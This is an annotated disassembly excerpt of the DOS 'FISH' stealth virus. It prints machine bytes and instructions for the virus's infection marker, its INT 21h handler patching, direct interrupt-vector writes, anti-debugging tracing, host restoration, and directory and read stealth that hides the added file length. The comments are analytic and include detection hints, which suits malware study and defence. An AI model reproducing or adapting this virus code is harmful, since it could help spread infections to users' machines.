;  FISH virus
;  Disassembled December 1990 Thomas E Dell <>
;  Infected host image as DEBUG shows it at CS:0100. The first six
;  bytes (E9 FB 0D 68 F5 63) are not host code: a near JMP to 0EFE
;  (target lies outside this excerpt) followed by three bytes chosen
;  so that word0 + word1 + NOT(word2) = 0 modulo 10000h
;  (FBE9 + 680D + NOT 63F5). The same sum is tested at 0520-052E,
;  071F-072D and 07E2-07F0 and produced at 0905-0910, so it acts as
;  the COM "already infected" marker. As a scanner heuristic it is
;  weak on its own (one clean file in 65536 matches by chance).
3411:0100 E9FB0D         JMP    0EFE
3411:0103 68F563
                         DB ' is a tiny COM program.',0DH,0AH,'$'
;  Remainder of the original host: print the '$'-terminated string
;  with INT 21h/AH=09, then terminate through INT 20h.
3411:0120 BA0201         MOV    DX,0102 
3411:0123 B409           MOV	AH,09 
3411:0125 CD21           INT	21 
3411:0127 CD20           INT    20
;  Zero fill after the host. The startup code at 0388-0389 derives
;  0130 as the base of the appended body, which puts the JMP below at
;  body offset 1.
3411:0129 0000000000000000
3411:0131 E9CA0D         JMP    0EFE
;  The first few bytes of the program are saved here, which can
;  contain either the start of the COM, or the ExeHeader.
;  This is data, not code: DEBUG has decoded the first two saved bytes
;  as an instruction. For a COM host the three words stored here are
;  copied back to 0100-0105 by the code at 0339-034B (read there as
;  CS:[0004]..[0008], i.e. relative to the body base 0130) before the
;  host is resumed.
3411:0134 EB1E           JMP    $+1E
                         DB 'This is a tiny COM program',0
;  Call previous INT21 handler.
;  PUSHF followed by a far CALL builds the same FLAGS/CS/IP frame an
;  INT instruction would, so the handler's IRET returns to the RET
;  below. CS:[0E35] is the far pointer stored at 029E (offset) and
;  028F (segment, in [0E37]).
3411:0151 9C             PUSHF
3411:0152 2EFF1E350E     CALL FAR CS:[0E35]
3411:0157 C3             RET
                        DB      0,'COD'
;  COD1 -- Save all the registers on the stack
;  Pushes FLAGS, AX, BX, CX, DX, SI, DI, DS, ES (in that order) on the
;  caller's stack. The near return address is first popped into the
;  fixed cell CS:[0EEA] so that the nine pushed words remain on the
;  stack after the routine leaves through that cell. COD2 at 016F
;  shares the cell, so a re-entry between the POP and the JMP would
;  overwrite the stored return address.
3411:015C 2E8F06EA0E     POP    CS:[0EEA]       ; Save return address
3411:0161 9C             PUSHF	 
3411:0162 50             PUSH	AX 
3411:0163 53             PUSH	BX 
3411:0164 51             PUSH	CX 
3411:0165 52             PUSH	DX 
3411:0166 56             PUSH	SI 
3411:0167 57             PUSH	DI 
3411:0168 1E             PUSH	DS 
3411:0169 06             PUSH	ES 
3411:016A 2EFF26EA0E     JMP    CS:[0EEA]       ; Return to caller
;  COD2 -- Restore all registers
;  Exact mirror of COD1: pops ES, DS, DI, SI, DX, CX, BX, AX and FLAGS
;  from the current stack. The return address is parked in CS:[0EEA]
;  (the same cell COD1 uses) so it does not sit on top of the saved
;  register set while it is being popped.
3411:016F 2E8F06EA0E     POP    CS:[0EEA]       ; Save return address
3411:0174 07             POP	ES 
3411:0175 1F             POP	DS 
3411:0176 5F             POP	DI 
3411:0177 5E             POP	SI 
3411:0178 5A             POP	DX 
3411:0179 59             POP	CX 
3411:017A 5B             POP	BX 
3411:017B 58             POP	AX 
3411:017C 9D             POPF	 
3411:017D 2EFF26EA0E     JMP    CS:[0EEA]       ; Return to caller
                        DB      'SHARK'
;  SHARK1 -- restore all registers using internal stack
;  Parks the caller's SS:SP in CS:[0F59]:[0F57], switches to the
;  private stack (SS = CS, SP = CS:[0F5B]), pops the register set with
;  COD2, writes the advanced private SP back to CS:[0F5B] and returns
;  on the caller's stack. Counterpart of SHARK2 at 01AC.
3411:0187 2E8926570F     MOV    CS:[0F57],SP            ; save SP
3411:018C 2E8C16590F     MOV    CS:[0F59],SS            ; save SS
3411:0191 0E             PUSH	CS 
3411:0192 17             POP    SS                      ; internal SS
3411:0193 2E8B265B0F     MOV    SP,CS:[0F5B]            ; internal SP
3411:0198 2EE8D3FF       CALL   016F                    ; COD2 - restore regs
3411:019C 2E8E16590F     MOV    SS,CS:[0F59]            ; restore SS
3411:01A1 2E89265B0F     MOV    CS:[0F5B],SP            ; internal SP
3411:01A6 2E8B26570F     MOV    SP,CS:[0F57]            ; restore SP
3411:01AB C3             RET
;  SHARK2 -- save all registers using internal stack
;  Same stack switch as SHARK1, but calls COD1, so the nine register
;  words end up on the private stack at CS:[0F5B] rather than on the
;  caller's stack. The private SP is initialised to 1000 at 0238.
3411:01AC 2E8926570F     MOV    CS:[0F57],SP            ; save SP
3411:01B1 2E8C16590F     MOV    CS:[0F59],SS            ; save SS
3411:01B6 0E             PUSH	CS 
3411:01B7 17             POP    SS                      ; internal SS
3411:01B8 2E8B265B0F     MOV    SP,CS:[0F5B]            ; internal SP
3411:01BD 2EE89BFF       CALL   015C                    ; COD1 - save regs
3411:01C1 2E8E16590F     MOV    SS,CS:[0F59]            ; restore SS
3411:01C6 2E89265B0F     MOV    CS:[0F5B],SP            ; internal SP
3411:01CB 2E8B26570F     MOV    SP,CS:[0F57]            ; restore SP
3411:01D0 C3             RET	 
3411:01D1 8C
;  SHARK3 - swap the JMP xxxx:yyy and the real INT21 code. This must
;  be setup before attempting to execute the previous INT21.
;  Exchanges five bytes between the buffer at DS:0E4B (DS = CS) and
;  the first five bytes of the handler addressed by CS:[0E35]. The
;  exchange is symmetric, so calling it twice restores both sides.
;  Clobbers AL, CX, SI, DI, DS, ES and clears DF; visible callers
;  bracket it with SHARK2/SHARK1.
;  Analysis note: because the hook lives in the handler's code bytes
;  (opcode EA = far JMP, see 0293-02A2), the INT 21h vector itself is
;  left unchanged; comparing vector values will not reveal it, while
;  inspecting the first bytes at the vector target will.
3411:01D2 BE4B0E         MOV    SI,0E4B
3411:01D5 2EC43E350E     LES	DI,CS:[0E35] 
3411:01DA 0E             PUSH	CS 
3411:01DB 1F             POP	DS 
3411:01DC FC             CLD	 
3411:01DD B90500         MOV    CX,0005                 ; 5 bytes
3411:01E0 AC             LODSB	 
3411:01E1 268605         XCHG	AL,ES:[DI] 
3411:01E4 8844FF         MOV	[SI-01],AL 
3411:01E7 47             INC	DI 
3411:01E8 E2F6           LOOP   01E0
;  Note: the "C" in CARP below is a RET..!
;  NOTE(review): ASCII 'C' is 43h whereas near RET is C3h, and the gap
;  01EA-01EE is five bytes for a four-character string. A C3 byte in
;  front of the label (or a 'C' shown with its high bit stripped) would
;  explain both; confirm against the raw bytes.
                        DB      'CARP'
;  CARP1 -- Intercept single step interrupt. The original annotation
;  reports that the system crashes when FISH is followed with DEBUG,
;  presumably because the debugger's own INT 01h handler is replaced.
;  In:  nothing. Uses CARP2 with AL = 01 and DS:DX = CS:0CB7.
;  The handler at that offset is outside this excerpt.
3411:01EF B001           MOV    AL,01           ; INT01, single step
3411:01F1 0E             PUSH   CS
3411:01F2 1F             POP	DS 
3411:01F3 BAB70C         MOV    DX,0CB7         ; INT01 routine, at 0D9B
3411:01F6 E80100         CALL   01FA            ; CARP2 - set interrupt
3411:01F9 C3             RET
;  CARP2 - Set an interrupt by manipulating the 0000:0000 table directly
;  In:  AL = interrupt number, DS:DX = new handler.
;  Writes offset then segment to 0000:[AL*4]; BX and ES are preserved.
;  The vector is changed without INT 21h/AH=25, so a monitor that only
;  watches the DOS set-vector call does not observe it. There is no
;  CLI around the two word stores.
3411:01FA 06             PUSH	ES 
3411:01FB 53             PUSH	BX 
3411:01FC 33DB           XOR	BX,BX 
3411:01FE 8EC3           MOV	ES,BX 
3411:0200 8AD8           MOV	BL,AL 
3411:0202 D1E3           SHL	BX,1 
3411:0204 D1E3           SHL	BX,1 
3411:0206 268917         MOV	ES:[BX],DX 
3411:0209 268C5F02       MOV	ES:[BX+02],DS 
3411:020D 5B             POP	BX 
3411:020E 07             POP	ES 
3411:020F C3             RET
;  CARP3 - Get an interrupt from the segment 0000:0000 table
;  In:  AL = interrupt number.
;  Out: ES:BX = vector read from 0000:[AL*4]. AH is zeroed; DS and SI
;  are preserved. Like CARP2 it reads the table directly instead of
;  using INT 21h/AH=35.
3411:0210 1E             PUSH	DS 
3411:0211 56             PUSH	SI 
3411:0212 33F6           XOR	SI,SI 
3411:0214 8EDE           MOV	DS,SI 
3411:0216 32E4           XOR	AH,AH 
3411:0218 8BF0           MOV	SI,AX 
3411:021A D1E6           SHL	SI,1 
3411:021C D1E6           SHL	SI,1 
3411:021E 8B1C           MOV	BX,[SI] 
3411:0220 8E4402         MOV	ES,[SI+02] 
3411:0223 5E             POP	SI 
3411:0224 1F             POP	DS 
3411:0225 C3             RET
                        DB      'BASS'
;  BASS1 -- Continue the setup procedure.
;  Reached through the RETF at 039B. The single bytes listed after
;  each SPOOF/TUNA2 call (B9, 8E, EB, A1, A3) are filler; presumably
;  the callee steps the return address over them (0C87 and 0DC7 are
;  outside this excerpt -- confirm there).
3411:022A E8B002         CALL   04DD            ; SPOOF
3411:022D B9
3411:022E E8560A         CALL   0C87            ; TUNA2
3411:0231 8E
;  Keep the entry AX (reloaded at 0358/0362 before the host runs), set
;  the private stack pointer used by SHARK1/SHARK2, and remember the
;  entry DS, which the code at 031C-034E later treats as the PSP.
3411:0232 2EA3E30E       MOV    CS:[0EE3],AX
3411:0236 B452           MOV    AH,52           ; Get list of lists
3411:0238 2EC7065B0F0010 MOV	Word Ptr CS:[0F5B],1000 
3411:023F 2E8C1E450E     MOV	CS:[0E45],DS 
3411:0244 E8800B         CALL   0DC7            ; SPOOF
3411:0247 EB
3411:0248 CD21           INT    21
;  The word at ES:[BX-02] of the list of lists is the segment of the
;  first memory control block; it is compared with a handler segment
;  at 02B8.
3411:024A 268B47FE       MOV    AX,ES:[BX-02]
3411:024E 2EA3470E       MOV    CS:[0E47],AX
3411:0252 0E             PUSH	CS 
3411:0253 1F             POP	DS 
3411:0254 E8300A         CALL   0C87            ; TUNA2
3411:0257 A1
;  Read the current INT 21h vector straight from the table.
3411:0258 B021           MOV    AL,21           ; 21, DOS interrupt
3411:025A E8B3FF         CALL   0210            ; CARP3 - get interrupt
3411:025D 8C062F0E       MOV	[0E2F],ES 
3411:0261 891E2D0E       MOV    [0E2D],BX
;  Trace INT 21h under single step. The INT 01h vector is pointed at
;  CS:0CB7, the trap flag (0100h) is set at 0272-0278, and function 61h
;  is issued through the vector just read as a simulated INT
;  (PUSHF + far CALL); the trap flag is cleared again at 0280-0286.
;  The INT 01h routine is outside this excerpt; presumably it updates
;  [0E2D]/[0E2F] while the handler chain executes -- confirm there.
;  Analysis note: a direct rewrite of the INT 01h vector followed by
;  TF being set across an INT 21h call is a behaviour a resident
;  monitor can flag.
3411:0265 BAB70C         MOV    DX,0CB7         ; INT01 routine, at 0D9B
3411:0268 B001           MOV	AL,01 
3411:026A C606500E00     MOV	Byte Ptr [0E50],00 
3411:026F E888FF         CALL   01FA            ; CARP2 - set interrupt
3411:0272 9C             PUSHF	 
3411:0273 58             POP	AX 
3411:0274 0D0001         OR	AX,0100 
3411:0277 50             PUSH	AX 
3411:0278 9D             POPF	 
3411:0279 9C             PUSHF	 
3411:027A B461           MOV    AH,61
3411:027C FF1E2D0E       CALL	FAR [0E2D] 
3411:0280 9C             PUSHF	 
3411:0281 58             POP	AX 
3411:0282 25FFFE         AND	AX,FEFF 
3411:0285 50             PUSH	AX 
3411:0286 9D             POPF	 
3411:0287 E8E101         CALL	046B 
3411:028A A3
;  INT21 is never intercepted directly. Instead, the current
;  handler has a far jmp overwritten on top of it. The JMP written
;  points to the TROUT2 routine, our INT21 "tsr".
;  The five-byte patch EA yyyy xxxx is assembled in the buffer at
;  0E4B-0E4F and the handler address from [0E2D]/[0E2F] is copied to
;  [0E35]/[0E37]; SHARK3 then exchanges the buffer with the first five
;  bytes of that handler. The vector table entry for INT 21h is not
;  written here.
3411:028B C43E2D0E       LES    DI,[0E2D]
3411:028f 8C06370E       MOV    [0E37],ES
3411:0293 C6064B0EEA     MOV    Byte Ptr [0E4B],EA      ; jmp xxxx:yyyy
3411:0298 C7064C0E5B0D   MOV    Word Ptr [0E4C],0D5B    ; yyyy
3411:029E 893E350E       MOV	[0E35],DI 
3411:02A2 8C0E4E0E       MOV    [0E4E],CS               ; xxxx
3411:02A6 E80700         CALL	02B0 
3411:02A9 E826FF         CALL   01D2            ; SHARK3
3411:02AC E8170A         CALL   0CC6            ; SPOOF
3411:02AF 89
;  Subroutine called from 02A6. INT 2Fh is the DOS multiplex
;  interrupt. Its handler segment is compared with the first-MCB
;  segment saved at 024E; when the first MCB is at or above that
;  segment (JNB) the routine returns without doing anything else.
3411:02B0 B02F           MOV    AL,2F           ; int 2F, print spooler, why?
3411:02B2 E85BFF         CALL   0210            ; CARP3 - get interrupt
3411:02B5 8CC3           MOV    BX,ES
;  NOTE(review): the next address is printed as 02B8, but 02B5 plus a
;  two-byte instruction and the following 02BC both imply 02B7.
3411:02B8 2E391E470E     CMP    CS:[0E47],BX
3411:02BC 731C           JNB	02DA 
;  Otherwise the INT 13h vector is rewritten directly with the pointer
;  held in [0E2F]:[0E2D]. The routine at 0D00 is outside this excerpt
;  and may change that pointer first -- confirm before reading this as
;  "INT 13h := traced INT 21h entry".
3411:02BE E83F0A         CALL	0D00 
3411:02C1 2E8E1E2F0E     MOV	DS,CS:[0E2F] 
3411:02C6 2EFF362D0E     PUSH	CS:[0E2D] 
3411:02CB 5A             POP	DX 
3411:02CC B013           MOV    AL,13           ; BIOS disk access, INT13
3411:02CE E829FF         CALL   01FA            ; CARP2 - set interrupt
;  DS = 0, so the store below hits linear 00475h, i.e. 0040:0075 in
;  the BIOS data area (fixed-disk count on PC-compatible BIOSes);
;  the intent of forcing it to 2 is not visible here.
3411:02D1 33DB           XOR	BX,BX 
3411:02D3 8EDB           MOV	DS,BX 
3411:02D5 C606750402     MOV	Byte Ptr [0475],02 
3411:02DA C3             RET
                DB      ' FISH VIRUS #6 - EACH DIFF - BONN 2/90 '
;  The following are intended to be printed. Version letters?
                DB      ''~knzyvo}''
                DB      '$'
;  Return control to the host program. No visible code in this
;  excerpt references 030D, so the entry path is not shown.
;  The two SHARK3 calls bracket an update of the segment field of the
;  five-byte patch buffer (0E4E); presumably this refreshes the far
;  JMP with the current CS -- confirm against the resident copy logic.
3411:030D E8C2FE         CALL   01D2                    ; SHARK3
3411:0310 2E8C0E4E0E     MOV    CS:[0E4E],CS
3411:0315 E8BAFE         CALL   01D2                    ; SHARK3
3411:0318 0E             PUSH	CS 
3411:0319 1F             POP	DS 
3411:031A 1E             PUSH	DS 
3411:031B 07             POP	ES 
;  DS = ES = segment saved at 023F (the entry DS). AX + 10h is the
;  load segment used to relocate the saved EXE CS (body offset 1Ah)
;  and, at 035D, the saved SS (offset 12h). DX loaded by the LDS is
;  not used afterwards and DS is overwritten by the next instruction.
3411:031C A1450E         MOV	AX,[0E45] 
3411:031F 8EC0           MOV	ES,AX 
3411:0321 26C5160A00     LDS	DX,ES:[000A] 
3411:0326 8ED8           MOV	DS,AX 
3411:0328 051000         ADD	AX,0010 
3411:032B 2E01061A00     ADD	CS:[001A],AX 
;  Flag at body offset 20h: 0 = COM host, non-zero = EXE host
;  (set at 0858-086D).
3411:0330 2E803E200000   CMP    Byte Ptr CS:[0020],00   ; COM/EXE flag
3411:0336 FB             STI	 
3411:0337 7524           JNZ	035D 
;  COM host: put the three saved words back at 0100-0105, then far
;  return to saved-segment:0100 (XOR AX,AX / INC AH yields 0100h)
;  with the entry AX restored.
3411:0339 2EA10400       MOV	AX,CS:[0004] 
3411:033D A30001         MOV	[0100],AX 
3411:0340 2EA10600       MOV    AX,CS:[0006]
3411:0344 A30201         MOV	[0102],AX 
3411:0347 2EA10800       MOV	AX,CS:[0008] 
3411:034B A30401         MOV	[0104],AX 
3411:034E 2EFF36450E     PUSH	CS:[0E45] 
3411:0353 33C0           XOR	AX,AX 
3411:0355 FEC4           INC	AH 
3411:0357 50             PUSH	AX 
3411:0358 2EA1E30E       MOV	AX,CS:[0EE3] 
3411:035C CB             RETF
;  EXE host: relocate the saved SS, restore the entry AX, load SS:SP
;  from body offsets 12h/14h and jump through the far pointer at 18h
;  (IP at 18h, relocated CS at 1Ah).
3411:035D 2E01061200     ADD	CS:[0012],AX 
3411:0362 2EA1E30E       MOV	AX,CS:[0EE3] 
3411:0366 2E8B261400     MOV	SP,CS:[0014] 
3411:036B 2E8E161200     MOV	SS,CS:[0012] 
3411:0370 2EFF2E1800     JMP    FAR CS:[0018]
                        DB      'TROUT'
;  Startup and change code segment.
;  This routine is executed right after the virus has been decrypted.
;  It rebases CS so that the appended body starts at offset 0: the
;  CALL/POP pair yields the run-time offset of 037F, subtracting 024F
;  gives the body base (0130 in this sample), and (CS*16 + base) / 16
;  is the new segment. RETF then continues at newseg:00FA, the same
;  linear address as 022A (022A - 0130 = 00FA). From here on, data
;  references such as CS:[0004] or CS:[0E35] are body-relative, while
;  the addresses printed in the left column keep the original
;  segment. SP is forced to 0 first, so the CALL's return word lands
;  at SS:FFFE.
3411:037A 33E4           XOR    SP,SP 
3411:037C E80000         CALL	037F 
3411:037F 89C5           MOV    BP,AX           ; Save AX
3411:0381 8CC8           MOV    AX,CS           ; AX = segment
3411:0383 BB1000         MOV	BX,0010 
3411:0386 F7E3           MUL    BX              ; AX = segment shifted left
3411:0388 59             POP    CX              ; CX = 037F
3411:0389 81E94F02       SUB    CX,024F         ; CX = 0130
3411:038D 03C1           ADD	AX,CX 
3411:038F 83D200         ADC	DX,+00 
3411:0392 F7F3           DIV    BX              ; AX = seg + xxxx
3411:0394 50             PUSH	AX 
3411:0395 B8FA00         MOV	AX,00FA 
3411:0398 50             PUSH	AX 
3411:0399 89E8           MOV    AX,BP           ; Restore AX
3411:039B CB             RETF                   ; To BASS1 routine
;  I N T 2 1
;  TROUT2 -- INT21 processing. Come here right after
;  decrypting memory if required.
;  Common entry for every intercepted INT 21h call. On arrival the
;  stack holds the caller's IP, CS and FLAGS.
3411:039C E8CC00         CALL   046B            ; SPOOF
3411:039F CD
3411:03A0 E8240A         CALL   0DC7            ; SPOOF
3411:03A3 CB
;  Copy the caller's FLAGS word (SP+6 after the PUSH BX) to CS:[0EB3].
;  Handlers edit bit 0 (carry) of this copy, and the exit path at
;  0461-0466 writes it back into the IRET frame.
3411:03A4 53             PUSH	BX 
3411:03A5 8BDC           MOV	BX,SP 
3411:03A7 368B5F06       MOV	BX,SS:[BX+06] 
3411:03AB 2E891EB30E     MOV	CS:[0EB3],BX 
3411:03B0 5B             POP    BX
;  Frame: [BP] = old BP, [BP+2] = IP, [BP+4] = CS, [BP+6] = FLAGS.
;  COD1 below pushes FLAGS, AX, BX, CX, ... directly under it, so
;  [BP-4] is the saved AX and [BP-8] the saved CX.
3411:03B1 55             PUSH   BP
3411:03B2 89E5           MOV	BP,SP 
3411:03B4 E8D008         CALL   0C87            ; TUNA2
3411:03B7 A3
;  Swap back "IN" the first five bytes of the proper INT21 handler.
;  While they are in place the original handler can be called through
;  0151 without re-entering this code.
3411:03B8 E8F1FD         CALL   01AC            ; SHARK2 - save regs internal
3411:03BB E814FE         CALL   01D2            ; SHARK3
3411:03BE E8C6FD         CALL   0187            ; SHARK1 - rest regs internal
3411:03C1 E898FD         CALL   015C            ; COD1 - save registers
3411:03C4 E8C008         CALL   0C87            ; TUNA2
3411:03C7 88
;  Check the INT21 function number. This uses diversionary
;  tactics (random bytes) to prevent disassembly.
;  Every test has the shape CMP AH,nn / JNZ +4 / JMP handler / one
;  filler byte. The JNZ always skips the three-byte JMP plus the
;  filler, so the filler byte is never executed; it only throws a
;  linear-sweep disassembler out of step. Functions that match no
;  test fall through to 044E, which jumps to 0DA8 (outside this
;  excerpt; used throughout as the pass-through path).
;  The segment prefix changes from 3411 to 2FF2 in this part of the
;  listing while the offsets stay continuous, presumably because it
;  was captured in a separate DEBUG session.
;  Intercepted functions: FCB open/search/read/size (0F, 11, 12, 14,
;  21, 23, 27), handle open/close/read/seek (3D, 3E, 3F, 42), EXEC
;  (4B), handle search (4E, 4F) and file date/time (57).
3411:03C8 80FC0F         CMP    AH,0F           ; Open file with FCB
2FF2:03CB 7504           JNZ    03D1
2FF2:03CD E9E900         JMP    04B9
2FF2:03D0 B8
2FF2:03D1 80FC11         CMP    AH,11           ; First match FCB
2FF2:03D4 7504           JNZ    03DA
2FF2:03D6 E99B00         JMP    0474
2FF2:03D9 A1
2FF2:03DA 80FC12         CMP    AH,12           ; Next match FCB
2FF2:03DD 7504           JNZ    03E3
2FF2:03DF E99200         JMP    0474
2FF2:03E2 89
2FF2:03E3 80FC14         CMP    AH,14           ; Sequential read
2FF2:03E6 7504           JNZ    03EC
2FF2:03E8 E90901         JMP    04F4
2FF2:03EB EB
2FF2:03EC 80FC21         CMP    AH,21           ; Random read
2FF2:03EF 7504           JNZ    03F5
2FF2:03F1 E9F400         JMP    04E8
2FF2:03F4 8C
2FF2:03F5 80FC23         CMP    AH,23           ; Get file size
2FF2:03F8 7504           JNZ    03FE
2FF2:03FA E98401         JMP    0581
2FF2:03FD A3
2FF2:03FE 80FC27         CMP    AH,27           ; Random block read
2FF2:0401 7504           JNZ    0407
2FF2:0403 E9E000         JMP    04E6
2FF2:0406 EB
2FF2:0407 80FC3D         CMP    AH,3D           ; Open file
2FF2:040A 7504           JNZ    0410
2FF2:040C E9C601         JMP    05D5
2FF2:040F FF
2FF2:0410 80FC3E         CMP    AH,3E           ; Close file
2FF2:0413 7504           JNZ    0419
2FF2:0415 E90102         JMP    0619
2FF2:0418 A1
2FF2:0419 80FC3F         CMP    AH,3F           ; Read file or device
2FF2:041C 7504           JNZ    0422
2FF2:041E E97D07         JMP    0B9E
2FF2:0421 88
2FF2:0422 80FC42         CMP    AH,42           ; Move file pointer
2FF2:0425 7504           JNZ    042B
2FF2:0427 E94207         JMP    0B6C
2FF2:042A 8C
2FF2:042B 80FC4B         CMP    AH,4B           ; Launch
2FF2:042E 7504           JNZ    0434
2FF2:0430 E91C02         JMP    064F
2FF2:0433 EB
2FF2:0434 80FC4E         CMP    AH,4E           ; Search first match
2FF2:0437 7504           JNZ    043D
2FF2:0439 E95308         JMP    0C8F
2FF2:043C 89
2FF2:043D 80FC4F         CMP    AH,4F           ; Search next match
2FF2:0440 7504           JNZ    0446
2FF2:0442 E94A08         JMP    0C8F
2FF2:0445 8E
2FF2:0446 80FC57         CMP    AH,57           ; Get/set file date + time
2FF2:0449 7503           JNZ    044E
2FF2:044B E9CF06         JMP    0B1D
2FF2:044E E95709         JMP    0DA8
2FF2:0451 EB
;  Swap "OUT" the first five bytes of the original INT21 handler,
;  and install the FAR JMP to our INT21 TSR.
;  Common exit for handlers that completed the call themselves. After
;  the patch is back in place, the FLAGS copy kept in CS:[0EB3] is
;  written over the FLAGS slot of the interrupt frame ([BP+06]) so the
;  caller sees the carry state the handler chose, then BP is restored
;  and IRET returns to the caller.
2FF2:0452 E87209         CALL   0DC7            ; SPOOF
3411:0455 A1
3411:0456 E853FD         CALL   01AC            ; SHARK2 - save regs internal
3411:0459 E876FD         CALL   01D2            ; SHARK3
3411:045C E828FD         CALL   0187            ; SHARK1 - rest regs internal
3411:045F 89E5           MOV	BP,SP 
3411:0461 2EFF36B30E     PUSH	CS:[0EB3] 
3411:0466 8F4606         POP	[BP+06] 
3411:0469 5D             POP	BP 
3411:046A CF             IRET	 
;  SPOOF entry used at 0287 and 039C: increments the word counter at
;  CS:[0E31] and continues in TUNA2 (0C87, outside this excerpt). The
;  matching decrement is at 04DD. The counter's meaning is not visible
;  here.
3411:046B 2EFF06310E     INC	Word Ptr CS:[0E31] 
3411:0470 E91408         JMP    0C87            ; TUNA2
3411:0473 A1                                    ; filler, no reason
;  I N T 2 1 / AH = 11,12 -- First & Next match with FCB
;  Directory stealth for FCB searches: the real call is made first,
;  then the entry DOS wrote to the DTA is edited before the caller
;  sees it. Offsets are relative to the search result (drive byte
;  followed by the 32-byte directory entry); an extended FCB result
;  (first byte FFh) is seven bytes longer, hence the ADD BX,+07.
3411:0474 E8F8FC         CALL   016F            ; COD2 - restore registers
3411:0477 E8D7FC         CALL   0151            ; Call previous INT21
3411:047A 0AC0           OR     AL,AL
3411:047C 75D4           JNZ    0452            ; No matches found
3411:047E E8DBFC         CALL   015C            ; COD1 - save registers
3411:0481 E8C101         CALL   0645            ; Get DTA address
3411:0484 B000           MOV	AL,00 
3411:0486 803FFF         CMP	Byte Ptr [BX],FF 
3411:0489 7506           JNZ	0491 
3411:048B 8A4706         MOV	AL,[BX+06] 
3411:048E 83C307         ADD	BX,+07 
;  NOTE(review): CS:[0EF0] is ANDed with 0 (plain FCB) or with the
;  byte at offset 6 of the extended result; its role, and why a
;  non-zero value suppresses the length fix-up below, is not visible
;  in this excerpt.
3411:0491 2E2006F00E     AND    CS:[0EF0],AL
;  If from the FCB the file appears to be infected, subtract
;  the length of the virus, E00, from the reported length.
;  The marker is bit 7 of the high byte of the directory date
;  ([BX+1A]). The year occupies the top seven bits of the date word,
;  so subtracting C8h from that byte lowers the year by 100.
;  Analysis note: with the resident code inactive (clean boot) marked
;  files therefore show a date 100 years ahead and their true,
;  larger length.
3411:0496 F6471A80       TEST	Byte Ptr [BX+1A],80 
3411:049A 7415           JZ	04B1 
3411:049C 806F1AC8       SUB    Byte Ptr [BX+1A],C8     ; 100 years
3411:04A0 2E803EF00E00   CMP	Byte Ptr CS:[0EF0],00 
3411:04A6 7509           JNZ	04B1 
3411:04A8 816F1D000E     SUB    Word Ptr [BX+1D],0E00   ; Length of virus
3411:04AD 835F1F00       SBB    Word Ptr [BX+1F],+00
;  04B1 is the shared "restore registers and leave" tail used by most
;  handlers.
3411:04B1 E8BBFC         CALL   016F            ; COD2 - restore registers
3411:04B4 EB9C           JMP	0452 
                DB      'FIN'
;  I N T 2 1 / AH = 0F -- Open with FCB
;  The real open is done first; the registers are saved again
;  afterwards so DOS's return values reach the caller unchanged.
3411:04B9 E8B3FC         CALL   016F            ; COD2 - restore registers
3411:04BC E892FC         CALL   0151            ; Call INT21 to open file
3411:04BF E89AFC         CALL   015C            ; COD1 - save registers
3411:04C2 0AC0           OR     AL,AL
3411:04C4 75EB           JNZ    04B1            ; Unsuccessful
;  Diddle with the FCB to indicate "true" size of infected files
;  In the opened FCB (DS:DX) the size is at +10h..+13h and the date at
;  +14h..+15h. When bit 7 of the date's high byte is set, the year is
;  lowered by 100 and 0E00h is taken off the size, as in the FCB
;  search handler at 0496-04AD.
3411:04C6 89D3           MOV	BX,DX 
3411:04C8 F6471580       TEST   Byte Ptr [BX+15],80     ; Infected?
3411:04CC 74E3           JZ	04B1 
3411:04CE 806F15C8       SUB    Byte Ptr [BX+15],C8     ; 100 years
3411:04D2 816F10000E     SUB    Word Ptr [BX+10],0E00   ; Length of virus
3411:04D7 805F1200       SBB	Byte Ptr [BX+12],00 
3411:04DB EBD4           JMP    04B1
;  SPOOF entry used at 022A: decrements the word counter at CS:[0E31]
;  (incremented at 046B) and continues in TUNA2 at 0C87, which is
;  outside this excerpt. A3 is a filler byte after the JMP.
3411:04DD 2EFF0E310E     DEC	Word Ptr CS:[0E31] 
3411:04E2 E9A207         JMP    0C87            ; Spoof with TUNA2
3411:04E5 A3
;  I N T 2 1 / AH = 27 -- Random block read
;  A record count of zero (CX = 0) goes to the pass-through path.
3411:04E6 E31B           JCXZ   0503
;  I N T 2 1 / AH = 21 -- Random read
;  Only a read that starts at random record 0 (FCB+21h and FCB+23h
;  both zero) is intercepted.
3411:04E8 89D3           MOV	BX,DX 
3411:04EA 8B7721         MOV	SI,[BX+21] 
3411:04ED 0B7723         OR	SI,[BX+23] 
3411:04F0 7511           JNZ	0503 
3411:04F2 EB0A           JMP    04FE
;  I N T 2 1 / AH = 14 -- Sequential read
;  Tests the current block (FCB+0Ch) and current record (FCB+20h) for
;  the start of the file; the OR is on AL only, so just the low byte
;  of the block word takes part.
3411:04F4 89D3           MOV	BX,DX 
3411:04F6 8B470C         MOV	AX,[BX+0C] 
3411:04F9 0A4720         OR	AL,[BX+20] 
3411:04FC 7505           JNZ	0503 
;  PIKE2 is outside this excerpt; carry set on return means "leave
;  this call alone".
3411:04FE E8E304         CALL   09E4            ; PIKE2
3411:0501 7303           JNB	0506 
3411:0503 E948FF         JMP	044E 
;  Perform the real read, then store the returned CX and AX in the
;  saved-register frame ([BP-08] and [BP-04]) so the caller receives
;  them when COD2 runs at 04B1.
3411:0506 E866FC         CALL   016F            ; COD2 - restore registers
3411:0509 E850FC         CALL   015C            ; COD1 - save registers
3411:050C E842FC         CALL	0151 
3411:050F 894EF8         MOV	[BP-08],CX 
3411:0512 8946FC         MOV	[BP-04],AX 
3411:0515 1E             PUSH	DS 
3411:0516 52             PUSH	DX 
;  Inspect what was just read into the DTA. Two markers are accepted:
;  the word at offset 14h equal to 1 (the EXE header's initial IP is
;  set to 0001 at 08A9), or word0 + word1 + NOT(word2) = 0, the
;  three-word COM marker produced at 0905-0910.
3411:0517 E82B01         CALL   0645            ; Get DTA address
3411:051A 837F1401       CMP	Word Ptr [BX+14],+01 
3411:051E 741B           JZ     053B            ; MUSKY
3411:0520 8B07           MOV	AX,[BX] 
3411:0522 034702         ADD	AX,[BX+02] 
3411:0525 53             PUSH	BX 
3411:0526 8B5F04         MOV	BX,[BX+04] 
3411:0529 F7D3           NOT	BX 
3411:052B 01D8           ADD	AX,BX 
3411:052D 5B             POP	BX 
3411:052E 740B           JZ     053B            ; MUSKY
;  Not marked: drop the saved DS/DX and leave the data as read.
3411:0530 83C404         ADD	SP,+04 
3411:0533 E97BFF         JMP    04B1
                        DB      'MUSKY'
;  A musky is a large North American Pike that can
;  weigh as much as 80 pounds.
;  MUSKY -- read stealth for FCB reads of a marked file. The caller's
;  FCB (25h bytes) is copied to CS:0EB5 and used to re-read 1Ch bytes
